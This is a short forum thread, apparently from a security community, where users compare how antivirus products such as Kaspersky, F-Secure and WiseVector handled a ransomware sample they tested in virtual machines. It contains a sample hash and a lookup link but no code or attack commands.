5ea4a9f95efe0979bc5e8ff5137ee4ef035231fce07e136c41611e8a79c49f1c
</Data>
</EventData>
</Event>

The Ordynary · Apr 26, 2020

in a few days this ransomware will be on the detection list of all first-tier antiviruses, impressive that the so-called kaspersky behavior module has not caught, if he did not catch hardly any will.

Xjoker · Apr 26, 2020

Vitali Ortzi said:
Capture

Image Capture hosted in ImgBB

ibb.co

I was sure about it! Thanks for the test!

bayasdev · Apr 26, 2020

The Ordynary said:
in a few days this ransomware will be on the detection list of all first-tier antiviruses, impressive that the so-called kaspersky behavior module has not caught, if he did not catch hardly any will.

It's currently blacklisted by their cloud service https://opentip.kaspersky.com/C92E226D39B612785F8CE5074DA03DEEC6618E5C9AAEB4046AD153133B027805/ but the first victim (my VM) hypothetically lost its personal files

The Ordynary · Apr 26, 2020

geminis3 said:
It's currently blacklisted by their cloud service https://opentip.kaspersky.com/C92E226D39B612785F8CE5074DA03DEEC6618E5C9AAEB4046AD153133B027805/ but the first victim (my VM) hypothetically lost its personal files

I would like to have this file to test my defenses on the VM, Kaspersky is happy to have already included it in his defenses,

Vitali Ortzi · Apr 26, 2020

SEP unmanaged of course Failed

Capture hosted at ImgBB

Image Capture hosted in ImgBB

ibb.co

Hitman Pro Alert,H_C ,WVSX ,and any av application control module blocked it

Xjoker · Apr 26, 2020

I am really impressed with WV!!!

MacDefender · Apr 26, 2020

F-Secure SAFE blocked about half in default settings but moving their the test files into My Documents resulted in 100% blockage including the two false positives. I expect CFA to be similar.

Vitali Ortzi · Apr 26, 2020

Xenofon said:
I am really impressed with WV!!!

This sample isn't special but ones like fun.bat/exe test in the hub did surprise me and some signed sample i tested
But don't think you are safe i few samples i tested bypassed wise vector

App Review Kaspersky Security Cloud Free vs Ransominator (default settings)

Level 19

Level 28

Level 44

Level 28

Level 28

Level 44

Level 5

Level 44

Level 1

Level 7

Level 24

Level 24

Level 3

Level 1

Level 19

Level 3

Level 24

Level 1

Level 16

Level 24

Similar threads